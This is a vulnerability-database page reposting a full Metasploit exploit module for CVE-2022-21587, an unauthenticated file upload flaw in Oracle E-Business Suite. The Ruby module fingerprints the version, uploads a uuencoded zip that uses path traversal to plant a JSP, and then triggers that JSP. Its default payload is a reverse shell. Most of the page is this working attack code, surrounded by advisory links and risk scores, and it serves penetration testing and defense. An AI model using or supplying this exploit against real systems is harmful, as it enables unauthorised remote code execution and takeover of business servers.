Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload Exploit

🗓️ 02 Mar 2023 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 763 Views

Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload vulnerability exploited for Remote Code Executio

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for Missing Authentication for Critical Function in Oracle E-Business_Suite
6 Feb 202304:18
githubexploit
GithubExploit		Exploit for Missing Authentication for Critical Function in Oracle E-Business_Suite
6 Feb 202304:18
githubexploit
GithubExploit		Exploit for Missing Authentication for Critical Function in Oracle E-Business_Suite
3 Mar 202312:56
githubexploit
ICS		CISA Red Team’s Operations Against a Federal Civilian Executive Branch Organization Highlights the Necessity of Defense-in-Depth
11 Jul 202412:00
ics
ATTACKERKB		CVE-2022-21587
18 Oct 202200:00
attackerkb
BDU FSTEC		The vulnerability of the Upload component of the software environment for working with Oracle Web Applications desktop integrations allows a hacker to gain full control over the application.
6 Feb 202300:00
bdu_fstec
Circl		CVE-2022-21587
19 Oct 202200:14
circl
CISA KEV Catalog		Oracle E-Business Suite Unspecified Vulnerability
2 Feb 202300:00
cisa_kev
CNNVD		Oracle E-Business Suite 访问控制错误漏洞
18 Oct 202200:00
cnnvd
CVE		CVE-2022-21587
18 Oct 202200:00
cve
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload',
        'Description' => %q{
          This module exploits an unauthenticated arbitrary file upload vulnerability in Oracle Web Applications
          Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through to 12.2.11, in
          order to gain remote code execution as the oracle user.
        },
        'Author' => [
          'sf', # MSF Exploit & Rapid7 Analysis
          'HMs', # Python PoC
          'l1k3beef', # Original Discoverer
        ],
        'References' => [
          ['CVE', '2022-21587'],
          ['URL', 'https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis'],
          ['URL', 'https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/'],
          ['URL', 'https://github.com/hieuminhnv/CVE-2022-21587-POC']
        ],
        'DisclosureDate' => '2022-10-01',
        'License' => MSF_LICENSE,
        'Platform' => %w[linux],
        'Arch' => ARCH_JAVA,
        'Privileged' => false, # Code execution as user 'oracle'
        'Targets' => [
          [
            'Oracle EBS on Linux (OVA Install)',
            {
              'Platform' => 'linux',
              'EBSBasePath' => '/u01/install/APPS/fs1/',
              'EBSUploadPath' => 'EBSapps/appl/bne/12.0.0/upload/',
              'EBSFormsPath' => 'FMW_Home/Oracle_EBS-app1/applications/forms/forms/'
            }
          ]
        ],
        'DefaultOptions' => {
          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8000)
      ]
    )
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/OA_HTML/FrmReportData'
    )

    return CheckCode::Unknown('Connection failed') unless res

    return CheckCode::Unknown unless res.code == 200

    match = res.body.match(%r{jsLibs/Common(\d+_\d+_\d+)})

    if match && (match.length == 2)
      version = Rex::Version.new(match[1].gsub('_', '.'))

      if version.between?(Rex::Version.new('12.2.3'), Rex::Version.new('12.2.11'))
        return CheckCode::Appears("Oracle EBS version #{version} detected.")
      end

      return CheckCode::Safe("Oracle EBS version #{version} detected.")
    end

    CheckCode::Safe
  end

  def exploit
    endpoints = %w[BneViewerXMLService BneDownloadService BneOfflineLOVService BneUploaderService]

    target_url = "/OA_HTML/#{endpoints.sample}"

    print_status("Targeting the endpoint: #{target_url}")

    jsp_name = Rex::Text.rand_text_alpha_lower(3..8) + '.jsp'

    jsp_path = '../' * target['EBSUploadPath'].split('/').length

    jsp_path << "#{target['EBSFormsPath']}#{jsp_name}"

    jsp_absolute_path = "#{target['EBSBasePath']}#{target['EBSFormsPath']}#{jsp_name}"

    zip = Rex::Zip::Archive.new
    zip.add_file(jsp_path, payload.encoded)

    # The ZIP file is expected to be encoded with the binary to text encoding mechanism called uuencode.
    # For a detailed description refer to the Rapid7 AttackerKB analysis in the References section of this module.
    uue_data = "begin 777 #{Rex::Text.rand_text_alpha_lower(3..8)}.zip\n"
    uue_data << [zip.pack].pack('u')
    uue_data << "end\n"

    uue_name = "#{Rex::Text.rand_text_alpha_lower(3..8)}.uue"

    mime = Rex::MIME::Message.new
    mime.add_part(uue_data, 'text/plain', nil, %(form-data; name="file"; filename="#{uue_name}"))

    register_file_for_cleanup(jsp_absolute_path)

    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => target_url,
        'vars_get' => { 'bne:uueupload' => 'true' },
        'encode_params' => true,
        'ctype' => "multipart/form-data; boundary=#{mime.bound}",
        'data' => mime.to_s
      }
    )

    unless res && res.code == 200 && res.body.include?('bne:text="Cannot be logged in as GUEST."')
      fail_with(Failure::UnexpectedReply, 'Failed to upload the payload')
    end

    print_status('Triggering the payload...')

    send_request_cgi(
      'method' => 'GET',
      'uri' => "/forms/#{jsp_name}"
    )
  end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Mar 2023 00:00Current
0.1Low risk
Vulners AI Score0.1
CVSS 3.19.8
EPSS0.94397
oracle e-business suitearbitrary file uploadremote executioncve-2022-21587rapid7 analysis
763